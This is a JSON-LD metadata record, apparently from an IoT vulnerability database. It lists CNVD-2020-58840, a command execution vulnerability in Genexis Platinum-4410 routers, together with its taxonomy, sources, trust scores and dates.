"id": "VAR-202011-1584",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-58840"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-58840"
}
]
},
"last_update_date": "2022-05-04T09:50:04.509000Z",
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-58840"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-58840"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-58840"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum-4410 and FHTC-201709142001 have command execution vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-58840"
}
],
"trust": 0.6
}
}